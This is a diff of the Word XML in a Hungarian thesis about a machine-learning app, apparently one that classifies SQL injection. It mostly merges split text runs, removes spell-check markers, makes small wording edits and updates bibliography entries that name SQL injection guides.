-        <w:t>PrimaryController</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>olvassa be és</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a hozzá tartozó </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>primary.fxml</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t xml:space="preserve">szemlélteti </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>kördiagramo</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>n</w:t>
+        <w:t>kördiagram</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> segítségével</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -21375,59 +19129,13 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Error</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Based</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SQL Injection (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>SQLi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>Error Based SQL Injection (SQLi)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -21477,77 +19185,13 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Beginner</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Guide</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>to</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SQL Injection Boolean </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Based</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (Part 2)</w:t>
+        <w:t>Beginner Guide to SQL Injection Boolean Based (Part 2)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -21603,61 +19247,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Time </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Based</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Blind</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SQL Injection (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>SQLi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>Time Based Blind SQL Injection (SQLi)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -21707,106 +19297,14 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Blind</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Out-of-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>band</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SQL Injection </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>vulnerability</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> testing </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>added</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>to</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>AcuMonitor</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Blind Out-of-band SQL Injection vulnerability testing added to AcuMonitor</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -21861,54 +19359,8 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Mike </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Shema</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 2012. SQL Injection &amp; Data </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Store</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Manipulation</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Mike Shema 2012. SQL Injection &amp; Data Store Manipulation</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -21963,54 +19415,8 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">SQL Injection </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Prevention</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Cheat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Sheet</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>SQL Injection Prevention Cheat Sheet</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -22065,36 +19471,8 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Alex </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Kaechele</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 2018. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Classification</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Alex Kaechele 2018. Classification</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -22487,35 +19865,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Logistic</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Regression</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">a Logistic Regression </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -22607,30 +19957,8 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>K-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Nearest</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Neighbors</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>K-Nearest Neighbors</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -22727,49 +20055,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Linear</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Support</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Vector</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">a Linear Support Vector </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -23092,25 +20378,23 @@
         </w:rPr>
         <w:t xml:space="preserve">3.1-es ábra: </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>machine_learning_app</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">machine_learning_app, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>a program fő mappájának felépítése</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> TODO</w:t>
       </w:r>
     </w:p>
     <w:sectPr>

--- a/szakdolgozat.docx
+++ b/szakdolgozat.docx
@@ -15690,19 +15690,43 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">egy olyan karakter választja el, ami az értékek </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">– továbbiakban tokenek - </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">között nem fordul elő, ezáltal </w:t>
+        <w:t>egy olyan karakter választja el, ami az érték</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ben</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>– továbbiakban toke</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nekben</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nem fordul elő, ezáltal </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16013,13 +16037,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>második oszlopában</w:t>
+        <w:t xml:space="preserve"> második oszlopában</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16462,7 +16480,19 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">zoknak a tokeneknek a maximális száma, amelyeket megkülönböztetünk egymástól </w:t>
+        <w:t>zoknak a tokeneknek a maximális szám</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>á</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, amelyeket megkülönböztetünk egymástól </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16500,7 +16530,19 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">nnak a maximális száma, </w:t>
+        <w:t>nnak a maximális szám</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>át</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16743,7 +16785,13 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>sorozatot</w:t>
+        <w:t>sorozato</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kat</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16799,7 +16847,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">A collection.Counter típusából adódóan biztosítja a </w:t>
+        <w:t xml:space="preserve">A collection.Counter típusából adódóan biztosítja </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16894,13 +16942,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> tokenjei</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>nek</w:t>
+        <w:t xml:space="preserve"> tokenjeinek</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16928,7 +16970,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>indextoword</w:t>
+        <w:t>index</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16936,7 +16978,15 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>.</w:t>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>word.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17127,15 +17177,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>max_length</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">max_length </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17256,10 +17298,10 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CF0CC3C" wp14:editId="4CD7F8BB">
-            <wp:extent cx="3784795" cy="1892397"/>
-            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
-            <wp:docPr id="23" name="Kép 23"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D9F5D49" wp14:editId="1BAC2234">
+            <wp:extent cx="3553132" cy="1866900"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:docPr id="3" name="Kép 3"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -17279,7 +17321,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3784795" cy="1892397"/>
+                      <a:ext cx="3560234" cy="1870631"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -17764,19 +17806,97 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">egyrészt beolvassa a „toimport” numpy fájlokat, amiket a classifier2 metódusnak ad át, másrészt </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">beolvassa a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">„test” </w:t>
+        <w:t xml:space="preserve">egyrészt beolvassa </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">parancssori argumentumokon keresztül </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a „toimpor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tX</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>” numpy fáj</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (-z)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, amiket a classifier2 metódusnak ad át, másrészt </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">beolvassa </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hasonló módon (-x, -y) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>„test</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>X</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> „testy”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17902,7 +18022,19 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">A felügyelt tanulás 5 fő algoritmusára </w:t>
+        <w:t>A felügyelt tanulás 5 fő algoritmusára</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -…-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17914,7 +18046,19 @@
         <w:rPr>
